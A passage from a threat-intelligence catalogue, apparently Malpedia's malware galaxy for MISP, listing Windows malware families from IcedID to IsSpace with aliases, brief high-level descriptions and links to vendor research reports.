BokBot
IceID

Table 1991. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid
https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/
https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/
https://www.youtube.com/watch?v=7Dk7NkIbVqY
https://www.youtube.com/watch?v=wObF9n2UIAM
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://ceriumnetworks.com/threat-of-the-month-icedid-malware/
https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/
https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/
https://www.youtube.com/watch?v=wMXD4Sv1Alw
http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/
https://www.binarydefense.com/icedid-gziploader-analysis/
https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html
https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware
https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros
https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/
https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/
https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html
https://www.youtube.com/watch?v=oZ4bwnjcXWg
https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/
https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html
https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b
https://www.secureworks.com/research/threat-profiles/gold-swathmore
https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/
https://tccontre.blogspot.com/2021/01/
https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html
https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims
https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/
https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/
https://threatresearch.ext.hp.com/detecting-ta551-domains/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://github.com/telekom-security/icedid_analysis
https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid
https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/
https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/
https://thedfirreport.com/2021/05/12/conti-ransomware/
https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766
https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/
https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html
https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/
https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/
https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917
https://blog.reconinfosec.com/an-encounter-with-ta551-shathak
https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html
https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/
https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html
https://blog.minerva-labs.com/icedid-maas
https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html
https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/
https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware
https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites
https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders
https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf
https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html
https://unit42.paloaltonetworks.com/ta551-shathak-icedid/
https://www.youtube.com/watch?v=YEqLIR6hfOM
https://blog.talosintelligence.com/2020/07/valak-emerges.html
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/
https://github.com/f0wl/deICEr
https://netresec.com/?b=214d7ff
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/
https://www.group-ib.com/blog/icedid
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html
https://blog.group-ib.com/prometheus-tds
https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/
https://malwation.com/icedid-malware-technical-analysis-report/
https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back

IcedID Downloader

The tag is: misp-galaxy:malpedia="IcedID Downloader"

IcedID Downloader is also known as:

Table 1992. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader
http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

Icefog

The tag is: misp-galaxy:malpedia="Icefog"

Icefog is also known as:

Fucobha

Table 1993. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
http://www.kz-cert.kz/page/502
https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

Ice IX

The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.

The tag is: misp-galaxy:malpedia="Ice IX"

Ice IX is also known as:

Table 1994. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix
https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/
https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/
https://securelist.com/ice-ix-not-cool-at-all/29111/
https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus

IconDown

The tag is: misp-galaxy:malpedia="IconDown"

IconDown is also known as:

Table 1995. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown
https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html

IcyHeart

The tag is: misp-galaxy:malpedia="IcyHeart"

IcyHeart is also known as:

Troxen

Table 1996. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart

IDKEY

The tag is: misp-galaxy:malpedia="IDKEY"

IDKEY is also known as:

Table 1997. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey
https://isc.sans.edu/diary/22766

IISniff

The tag is: misp-galaxy:malpedia="IISniff"

IISniff is also known as:

Table 1998. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/
https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/

IISpy

The tag is: misp-galaxy:malpedia="IISpy"

IISpy is also known as:

BadIIS

Table 1999. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy
https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/

Imecab

The tag is: misp-galaxy:malpedia="Imecab"

Imecab is also known as:

Table 2000. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east
https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

Imminent Monitor RAT

The tag is: misp-galaxy:malpedia="Imminent Monitor RAT"

Imminent Monitor RAT is also known as:

Table 2001. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html
https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/
https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/
https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

Immortal Stealer

ZScaler describes Immortal Stealer as a windows malware written in .NET designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.

The tag is: misp-galaxy:malpedia=" Immortal Stealer"

Immortal Stealer is also known as:

Table 2002. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer
https://www.zscaler.com/blogs/research/immortal-information-stealer

IndigoDrop

The tag is: misp-galaxy:malpedia="IndigoDrop"

IndigoDrop is also known as:

Table 2003. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.indigodrop
https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

Industroyer

Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.

The tag is: misp-galaxy:malpedia="Industroyer"

Industroyer is also known as:

Crash
CrashOverride

Table 2004. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer
https://en.wikipedia.org/wiki/Industroyer
https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too
https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/
https://www.secureworks.com/research/threat-profiles/iron-viking
https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/
https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Inferno

The tag is: misp-galaxy:malpedia="Inferno"

Inferno is also known as:

Table 2005. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno
https://github.com/LimerBoy/Inferno

InfoDot

Ransomware.

The tag is: misp-galaxy:malpedia="InfoDot"

InfoDot is also known as:

Table 2006. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot
https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html

Infy

The tag is: misp-galaxy:malpedia="Infy"

Infy is also known as:

Foudre

Table 2007. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.infy
https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv
http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/
https://cloud.tencent.com/developer/article/1738806
https://www.intezer.com/prince-of-persia-the-sands-of-foudre/
http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/
https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/
https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf
https://research.checkpoint.com/2021/after-lightning-comes-thunder/
https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

InnaputRAT

InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.

The tag is: misp-galaxy:malpedia="InnaputRAT"

InnaputRAT is also known as:

Table 2008. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat
https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

win.innfirat

InnifiRAT is coded in .NET and targets personal data on infected devices, with it’s top priority appearing to be bitcoin and litecoin wallet data.

InffiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.

It attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality.

The tag is: misp-galaxy:malpedia="win.innfirat"

win.innfirat is also known as:

Table 2009. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat
https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more

Interception

ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.

The tag is: misp-galaxy:malpedia="Interception"

Interception is also known as:

Table 2010. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.interception
https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf

InvisiMole

InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. The malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library. Malware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.

The smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.

The second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces.

The tag is: misp-galaxy:malpedia="InvisiMole"

InvisiMole is also known as:

Table 2011. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole
https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/
https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf
https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Ironcat

The tag is: misp-galaxy:malpedia="Ironcat"

Ironcat is also known as:

Table 2012. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ironcat
https://aaronrosenmund.com/blog/2020/09/26/ironcat-ransmoware/
https://twitter.com/demonslay335/status/1308827693312548864

IRONHALO

IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.
The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.

The tag is: misp-galaxy:malpedia="IRONHALO"

IRONHALO is also known as:

Table 2013. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo
https://www.symantec.com/security-center/writeup/2015-122210-5128-99
https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html
https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

ISFB

2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)

In September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.

The other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.

There is one panel which often was used in combination with ISFB: IAP. The panel’s login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.

ISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.

In April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="ISFB"

ISFB is also known as:

Gozi ISFB
IAP
Pandemyia

Table 2014. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb
https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/
https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy
https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html
https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/
https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
https://lokalhost.pl/gozi_tree.txt
https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf
https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/
https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245
https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html
https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/
https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/
https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html
https://www.cyberbit.com/new-ursnif-malware-variant/
https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware
https://threatresearch.ext.hp.com/detecting-ta551-domains/
https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/
https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/
https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/
https://www.youtube.com/watch?v=jlc7Ahp8Iqg
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
http://benkow.cc/DreambotSAS19.pdf
https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html
https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/
https://blog.talosintelligence.com/2020/07/valak-emerges.html
https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/
https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15
https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/
https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware
https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/
https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization
https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html
https://www.tgsoft.it/files/report/download.asp?id=568531345
https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html
https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf
https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/
https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/
https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them
https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/
https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html
https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb
https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/
https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/
https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/
https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://redcanary.com/resources/webinars/deep-dive-process-injection/
https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features
https://www.tgsoft.it/files/report/download.asp?id=7481257469
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://github.com/mlodic/ursnif_beacon_decryptor
https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html
https://www.youtube.com/watch?v=KvOpNznu_3w
https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/
https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/
https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass

ISMAgent

The tag is: misp-galaxy:malpedia="ISMAgent"

ISMAgent is also known as:

Table 2015. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
http://www.clearskysec.com/ismagent/
https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/

ISMDoor

The tag is: misp-galaxy:malpedia="ISMDoor"

ISMDoor is also known as:

Table 2016. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
http://www.clearskysec.com/greenbug/
https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon
https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

iSpy Keylogger

The tag is: misp-galaxy:malpedia="iSpy Keylogger"

iSpy Keylogger is also known as:

Table 2017. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger
https://www.zscaler.com/blogs/research/ispy-keylogger
https://www.secureworks.com/research/threat-profiles/gold-skyline

IsraBye

The tag is: misp-galaxy:malpedia="IsraBye"

IsraBye is also known as:

Table 2018. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye
https://twitter.com/malwrhunterteam/status/1085162243795369984

ISR Stealer

ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper. ISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.

Incredibly, it uses an hard-coded user agent string: HardCore Software For : Public

The tag is: misp-galaxy:malpedia="ISR Stealer"

ISR Stealer is also known as:

Table 2019. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer
https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/

IsSpace

The tag is: misp-galaxy:malpedia="IsSpace"

IsSpace is also known as:

NfLog RAT

Table 2020. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace
https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf
https://www.secureworks.com/research/threat-profiles/bronze-express
http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/
http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf
